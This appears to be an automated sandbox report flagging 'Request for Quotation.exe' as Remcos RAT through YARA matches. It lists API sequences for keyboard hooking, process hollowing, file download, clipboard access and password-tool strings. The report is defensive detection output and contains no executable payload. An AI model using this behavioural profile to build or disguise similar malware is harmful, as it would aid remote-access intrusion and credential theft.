          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,1_2_0040532D
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,1_1_0040532D

          E-Banking Fraud:

          barindex
          Yara detected Remcos RATShow sources
          Source: Yara matchFile source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Request for Quotation.exe PID: 7164, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Request for Quotation.exe PID: 612, type: MEMORY
          Source: Yara matchFile source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
          Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
          Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
          Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 0.2.Request for Quotation.exe.2a50000.5.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 0.2.Request for Quotation.exe.2a50000.5.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
          Source: 1.2.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Request for Quotation.exe
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,1_2_0040F219
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040F219 _EH_prolog,CloseHandle,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,1_1_0040F219
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00401806 NtdllDefWindowProc_W,3_2_00401806
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_004018C0 NtdllDefWindowProc_W,3_2_004018C0
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0040DD85 CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,3_1_0040DD85
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0040DE0B NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,OpenProcess,GetCurrentProcess,DuplicateHandle,NtQueryObject,CloseHandle,CloseHandle,3_1_0040DE0B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00402CAC NtdllDefWindowProc_A,4_2_00402CAC
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00402D66 NtdllDefWindowProc_A,4_2_00402D66
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004016FC NtdllDefWindowProc_A,5_2_004016FC
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004017B6 NtdllDefWindowProc_A,5_2_004017B6
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00403486 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403486
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait1_2_0040D2A6
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait1_1_0040D2A6
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_004072720_2_00407272
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_00406A9B0_2_00406A9B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 0_2_6F711A980_2_6F711A98
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_2_0040D2A61_2_0040D2A6
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 1_1_0040D2A61_1_0040D2A6
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044B0403_2_0044B040
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0043610D3_2_0043610D
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_004473103_2_00447310
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044A4903_2_0044A490
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0040755A3_2_0040755A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0043C5603_2_0043C560
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044B6103_2_0044B610
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044D6C03_2_0044D6C0
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_004476F03_2_004476F0
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044B8703_2_0044B870
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044081D3_2_0044081D
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_004149573_2_00414957
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_004079EE3_2_004079EE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00407AEB3_2_00407AEB
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044AA803_2_0044AA80
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00412AA93_2_00412AA9
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00404B743_2_00404B74
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00404B033_2_00404B03
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_0044BBD83_2_0044BBD8
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00404BE53_2_00404BE5
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00404C763_2_00404C76
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00415CFE3_2_00415CFE
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00416D723_2_00416D72
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00446D303_2_00446D30
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00446D8B3_2_00446D8B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_2_00406E8F3_2_00406E8F
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044B0403_1_0044B040
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_004570B93_1_004570B9
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_004562B53_1_004562B5
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_004763473_1_00476347
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_004473103_1_00447310
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044A4903_1_0044A490
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0043C5603_1_0043C560
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044B6103_1_0044B610
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044D6C03_1_0044D6C0
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_004476F03_1_004476F0
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044B8703_1_0044B870
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_004149573_1_00414957
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044090C3_1_0044090C
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00414A783_1_00414A78
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00412AF93_1_00412AF9
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044AA803_1_0044AA80
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00412AA93_1_00412AA9
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_0044BBD83_1_0044BBD8
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00412CD73_1_00412CD7
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00416D723_1_00416D72
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00446D303_1_00446D30
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00446D8B3_1_00446D8B
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 3_1_00412E383_1_00412E38
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004050C24_2_004050C2
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004014AB4_2_004014AB
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004051334_2_00405133
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004051A44_2_004051A4
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004012464_2_00401246
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_0040CA464_2_0040CA46
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004052354_2_00405235
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004032C84_2_004032C8
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004222D94_2_004222D9
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_004016894_2_00401689
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_2_00402F604_2_00402F60
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_0040CA464_1_0040CA46
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 4_1_004222D94_1_004222D9
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0040D0445_2_0040D044
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004050385_2_00405038
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004050A95_2_004050A9
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0040511A5_2_0040511A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004051AB5_2_004051AB
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004382F35_2_004382F3
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004305755_2_00430575
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0043B6715_2_0043B671
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0041F6CD5_2_0041F6CD
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_004119CF5_2_004119CF
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00439B115_2_00439B11
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00438E545_2_00438E54
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_00412F675_2_00412F67
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_2_0043CF185_2_0043CF18
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_0041E13A5_1_0041E13A
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_004225895_1_00422589
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_0041F6CD5_1_0041F6CD
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: 5_1_0043CF185_1_0043CF18
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 0042FE8B appears 44 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00414176 appears 50 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 004169A7 appears 196 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 004165FF appears 75 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00412627 appears 34 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00413CE8 appears 46 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00413D18 appears 36 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 0041203B appears 62 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 0044407A appears 37 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00413DCE appears 48 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 004124F0 appears 36 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00414060 appears 38 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 004440AA appears 60 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 004440C8 appears 32 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 0044DB70 appears 50 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00412968 appears 176 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00413E72 appears 98 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00421A32 appears 45 times
          Source: C:\Users\user\Desktop\Request for Quotation.exeCode function: String function: 00416760 appears 106 times
          Source: Request for Quotation.exe, 00000000.00000003.638628482.0000000002B86000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000000.00000002.642974977.0000000000A40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000001.00000003.654310142.0000000002A69000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Request for Quotation.exe
          Source: Request for Quotation.exeBinary or memory string: OriginalFileName vs Request for Quotation.exe
          Source: Request for Quotation.exeBinary or memory string: OriginalFilename vs Request for Quotation.exe
          Source: Request for Quotation.exe, 00000004.00000001.651818512.000000000041B000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Request for Quotation.exe
          Source: Request for Quotation.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 00000000.00000002.644079874.0000000002A50000.00000004.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.1.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
          Source: 1.1.Request for Quotation.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
          Source: 1.2.Request for Quotation.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos_1 author = kevoreilly, description = Remcos Payload, cape_type = Remcos Payload
